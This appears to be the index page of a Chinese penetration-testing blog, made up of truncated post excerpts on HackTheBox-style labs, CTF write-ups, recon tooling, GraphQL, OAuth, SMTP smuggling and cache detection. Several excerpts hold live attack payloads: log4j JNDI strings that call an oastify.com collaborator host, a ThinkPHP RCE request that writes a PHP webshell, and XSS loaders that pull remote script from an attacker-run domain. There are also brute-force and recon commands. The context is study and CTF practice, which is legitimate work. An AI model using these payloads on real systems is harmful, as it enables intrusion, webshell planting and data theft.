L的博客

ps 我个人是在美国的服务器上架设代理，在vps上连接openvpn，然后使用proxifier来转发流量，liunx就用proxychains4，这样虽然比较快，但是端口扫描就只能在服务器上做了常用nmap全端口扫描1nmap -sS -sV 10.129.88.187 -p- -T5 -vv 拿到shell拿到shell后先尝试提权看用户文件而后查看后台进程 ps -aux传fscan扫其他主机的服务 Meow nmap扫太慢了，拿fscan扫可以发现开启了23端口telnet服务，尝试登陆 1telnet 10.129.150.178 直接root登陆，未授权。 正常可以用msf来爆破 kali自带自带子在1/usr/share/wordlists/legion/ Fawn FTP存在匿名登陆 匿名账号anonymous 使用msf的ftp login 模块设置好字典，账号密码用空格分隔+1set USERPASS_FILE /usr/share/wordlists/legion/ftp-betterdefaultpasslist.txt 爆破出来后可以用 ...

[HZNUCTF 2023 final]ezjava 打开靶机其告诉我们会将uri的值计入log,且fastjson的版本为1.2.48首先这个版本的fastjson是不存在我们所俗知的fastjson反序列化漏洞的,其只存在原生反序列化漏洞,而题目说会将内容计入log,着让人想到了log4j的漏洞从jndi注入到log4j注入先尝试以下payload1${jndi:dns://v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com} 可以发现成功进行了dns请求者就证明了此处存在JNDI注入我们再探测以下java版本1${jndi:dns://${sys:java.version}.v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com} 可以发现其版本为1.8.0.222这个版本的java是无法直接通过ldap来进行命令执行的而题目说其fastjson的版本为1.2.48.那么我们就可以使用ldap来触发fastjson原生反序列化从而命令 ...

今天不知道学点什么就氪金打了一下春秋云镜的靶场。只能说我对域的了解几乎为0。这篇文章记录一下域渗透的一些知识，和tp——cve的漏洞成因吧thinkphp5.23rce漏洞再路由随便传参数?s=asdwdwa就会发生报错，通过报错可以发现该think版本为5.23其漏洞payload如下123GET /?s=captcha_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs/Pg==' |base64 -d > shell.php我们直接写马通过哥斯拉来连接 其权限为www-data。我们先进行常规提权。先尝试suid提权并没有发现可以利用的命令再尝试进行sudo提权可以发现我们能够无密码使用mysql我这里贴一个sudo提权的文章Linux提权之Sudo 70种提权方法（上）Linux提权之Sudo 70种提权方法（中）Linux提权之Sudo 7 ...

无聊在刷portswigger时发现portswigger原来还有对年度十大研究成果进行排名，感觉都挺有意思的。2023/top3：SMTP走私——全球范围内的电子邮件伪造所谓SMTP请求走私就是利用SMTP服务器的发送端和接收端的差异而进行的。 SMTP报文结果，发送端和接受端的简介首先我们得先了解一下发送端于接受端的功能对应报文的处理 报文结构123456789From: Alice <alice@example.com>\r\nTo: Bob <bob@example.com>\r\nSubject: Test\r\nDate: Thu, 10 Dec 2025 15:30:00 +0800\r\n\r\nHello Bob,\r\nThis is a test email.\r\n.\r\n 可以发现其实就是邮件头加消息即body的结构，然后使用单独一行的.即<CRLF> . <CRLF>来当结束符。 发送端于发送端的差异首先发送端遇到<CRLF> . <CRLF>即结束符号时会进行截断直接不解析后面的即只 ...

https://conote.xsslse.xyz/xssconote+飞书通知payload如下Import:Script:Input:Img:Video:IFrame:XMLHTTP: 1234567"><img src='z' onerror=import('https://lse11.cn/Kq8Snzf8.js?n=0d1a98')>"><script src=https://lse11.cn/Kq8Snzf8.js?n=0d1a98></script>"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbHNlMTEuY24vS3E4U256ZjguanM/bj0wZDFhOTgiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocu ...

子域名+探活subfinder1subfinder -dL domain.txt -all >> domians1.txt oneforall1python3 oneforall.py --targets domain.txt run httpx1cat all_domains.txt|httpx -ports 80,443,8080,8000,8888,8443 -sc -title -mc 200,404,403,302 -threads 200 |tee subdomains_alive.txtTscan截图 渗透时naabu发现非80，443的web端口1 url收集被动收集gau+ourgau容易被ban1cat livesubdomains.txt | gau | sort -u > urls2.txt VirusTotal.sh+ourhttps://github.com/coffinxp/scripts/blob/main/virustotal.sh1

什么是GraphQL?GraphQL 其实就是一种api查询语言,其可以对api端点的数据进行查询,修改删除,和订阅。 什么是GrapQL的查询其实也就是query关键词比如如下代码123456query myGetProductQuery { getProduct(id: 123) { name description }} 其中myGetProductQuery是我们自定义的，数据名查询后的内容会以这个为key值内部的getProduct(id: 123)，这个操作其实就是类似于调用一个内部已经定义好的函数，传入的参数是id值为123，内部的name和description其实就是要求其返回的数据段。 什么是 GraphQL mutationsmutations就是以某一种方法来更改数据，添加和删除数据。这个结构其实和查询差不多，其实也是调用了内部自定义好的接口1234567mutation { createProduct(name: "Flamin' Cocktai ...

什么是OAuth2.0认证OAuth2.0其实就是第三方登陆的一种授权类型，其给授权流程定义了一个标准。 Oauth的流程与种类隐式# 识别OAuth认证与OAuth的攻击注意一般Oauth登陆的文章再文件进入时会向授权服务端发送类似如下的请求12https://xxxx.xx/auth?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=token&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1Host: oauth-authorization-server.com当然参数不止有如上的两个还有很多，但是一般都会包含着两个参数再发现服务端时我们可以尝试服务如下路径来尝试查看其配置文件12/.well-known/oauth-authorization-server/.well-known/openid-configuration 靶场：通过OAuth隐式流程绕过认证其实这个靶场更加类似于idor ...

爬虫模块。使用ktana来进行url的主动爬取，深度要可选择，默认就2吧使用gau来被动获取url将获取的所有url丢到下面的缓存检测模块进行检测，并标记上是否缓存进行分类。以方便下面的缓存逻辑检测模块 缓存检测模块对同一个url进行3次请求，当三次中出现了如下的响应头的规范就缓存命中 cdn出现如下响应头时其缓存命中123456789101112131415161718CDN提供商 缓存状态响应头字段 表示命中的值 响应头示例Cloudflare CF-Cache-Status HIT CF-Cache-Status: HITAWS CloudFront X-Cache Hit from cloudfront X-Cache: Hit from cloudfrontAkamai X-Cache, Server-Timing 包含HIT的值 X-Cache: TCP_HIT, Server-Timing: cdn-cache; desc=HITFastly X-Cache, X-Served-By HIT X-Cache: HIT, HIT, X-Served-By: cache-hk ...